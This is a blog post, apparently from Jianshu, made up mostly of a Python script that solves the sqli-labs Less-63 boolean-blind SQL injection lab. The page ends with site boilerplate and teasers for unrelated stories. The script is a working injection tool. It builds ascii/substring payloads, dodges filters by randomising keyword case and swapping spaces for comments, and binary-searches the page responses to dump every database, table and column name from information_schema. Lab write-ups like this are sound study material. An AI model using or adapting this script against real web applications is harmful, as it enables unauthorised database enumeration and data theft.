#!/usr/bin/env python
# encoding:utf8
import requests
import time
import sys
import random
# hack-config-start
payload = "0'|()--+" # 樣例 : 0"or()or"="1 或 0' or()or '='1 用空括號把產生Bool值的地方包裹起來
success_symbol = "Your Login name :"
url = "http://127.0.0.1/Less-63/?id="
# 如果對參數進行了過濾 , 需要配置temper函數 , 雙寫或者加注釋繞過
# hack-config-end
# config-start
sleep_time = 5
error_time = 1
# config-end
# define-start
system_schema_names = ['information_schema','test','mysql','performance_schema','phpmyadmin']
# 關鍵字
random_up_low_keywords = ['select','union','from','limit']
# 函數名
random_up_low_keywords.append('ascii')
random_up_low_keywords.append('substring')
# 系統庫名/表名/列名
random_up_low_keywords.append('information_schema')
random_up_low_keywords.append('schemata')
random_up_low_keywords.append('tables')
random_up_low_keywords.append('columns')
random_up_low_keywords.append('schema_name')
random_up_low_keywords.append('table_name')
random_up_low_keywords.append('column_name')
# define-end
# TODO-start
# 優化顯示
# TODO-end
def temper(tempPayload):
global random_up_low_keywords
for tempKeyword in random_up_low_keywords:
tempPayload = tempPayload.replace(tempKeyword,getRandomType(tempKeyword))
tempPayload = tempPayload.replace(" ","/**/")
tempPayload = tempPayload.replace(" ","%a0")
# tempPayload = tempPayload.replace("or","oorr")
# tempPayload = tempPayload.replace("and","anandd")
return tempPayload
def getRandomType(keywords):
# TODO 返回隨機大小寫
random_int = random.randint(0, len(keywords) - 1)
tempList = list(keywords)
tempList[random_int] = tempList[random_int].upper()
return "".join(tempList)
def getPayload(database_name, table_name, column_name, where, indexOfResult, indexOfChar, mid):
global payload
# http://127.0.0.1/Less-65/index.php?id=0"or()or"="1
startStr = payload.split("()")[0]
endStr = payload.split("()")[1]
# ((asCIi(sUBString((sELEct/**/scheMA_Name/**/FRom/**/inforMATion_scheMa.schemaTa/**//**/liMit/**/0,1),1,1)))>0)
temppayload = "((ascii(substring((select " + column_name + " from " + database_name + "." + table_name + " " + where + " limit " + indexOfResult + ",1)," + indexOfChar + ",1)))>" + mid + ")"
temppayload = startStr + temppayload + endStr
# temper
temppayload = temper(temppayload)
return temppayload
def exce(database_name, table_name, column_name, where, indexOfResult, indexOfChar, mid):
global success_symbol
global url
# content-start
tempurl = url + getPayload(database_name, table_name, column_name, where, indexOfResult, indexOfChar, mid)
content = requests.get(tempurl).text
# print content
# content-end
# judge-start
if success_symbol in content:
return True
else:
return False
# judge-end
def doubleSearch(database_name, table_name, column_name, where, indexOfResult,indexOfChar,left_number, right_number):
while left_number < right_number:
mid = int((left_number + right_number) / 2)
if exce(database_name, table_name, column_name, where, str(indexOfResult),str(indexOfChar + 1),str(mid)):
left_number = mid
else:
right_number = mid
if left_number == right_number - 1:
if exce(database_name, table_name, column_name, where, str(indexOfResult),str(indexOfChar + 1),str(mid)):
mid += 1
break
else:
break
return chr(mid)
def getAllData(database_name, table_name, column_name, where):
allData = []
for i in range(32): # 需要遍歷的查詢結果的數量
counter = 0
data = ""
for j in range(32): # 結果的長度
counter += 1
temp = doubleSearch(database_name, table_name, column_name, where, i, j, 0, 128) # 從255開始查詢
if ord(temp) == 1: # 當為1的時候說明已經查詢結束
break
sys.stdout.write(temp)
sys.stdout.flush()
data += temp
if counter == 1: # 當結果集的所有行都被遍歷后退出
break
sys.stdout.write("\r\n")
sys.stdout.flush()
allData.append(data)
return allData
def getAllSchemaNames():
return getAllData(column_name="schema_name", table_name="schemata", database_name="information_schema", where="")
def getAllTableNames(schema_name):
return getAllData(column_name="table_name", table_name="tables", database_name="information_schema", where="where(table_schema='" + schema_name + "')")
def getAllColumnNames(schema_name, table_name):
return getAllData(column_name="column_name", table_name="columns", database_name="information_schema", where="where(table_name='" + table_name + "' and table_schema='" + schema_name + "')")
def hack():
print "================================"
print "正在獲取所有數據庫 ..."
allSchemaNames = getAllSchemaNames()
print "所有數據庫名獲取完畢 !"
print "================================"
print "正在獲取所有數據庫表名 ..."
tempDic = {}
allUserSchemaNames = []
for schema_name in allSchemaNames:
print "--------------------------------"
print "當前數據庫 : " + schema_name + "\t",
IS_SYSTEM_SCHEMA = False
for system_schema_name in system_schema_names:
if system_schema_name == schema_name:
print "Mysql自帶系統數據庫 , 智能忽略 !"
IS_SYSTEM_SCHEMA = True
break
if not IS_SYSTEM_SCHEMA:
print ""
allUserSchemaNames.append(schema_name)
tempDic[schema_name] = getAllTableNames(schema_name)
print "所有表名獲取完畢!"
print "================================"
print "正在獲取所有表列名 ..."
for schema_name in allUserSchemaNames:
print "--------------------------------"
for table_name in tempDic[schema_name]:
print "當前數據庫 : " + schema_name + "\t當前表名 : " + table_name
getAllColumnNames(schema_name, table_name)
print "所有列名獲取完畢!"
print "================================"
hack()
[sqli-labs]Less-63(Bool盲注)
最后編輯于 :
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
- 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
- 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
- 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
推薦閱讀更多精彩內容
- 這道題發現頁面中會顯示出GET過去的參數不過好像沒有URL解碼...好奇怪 , 感覺好像是傳過去之后又被編碼了 ,...
- 打開主頁進入第一關 : 提示傳入id這個參數 發現這個頁面會根據傳入的ID查詢到對應的用戶這里我們可以通過查看數據...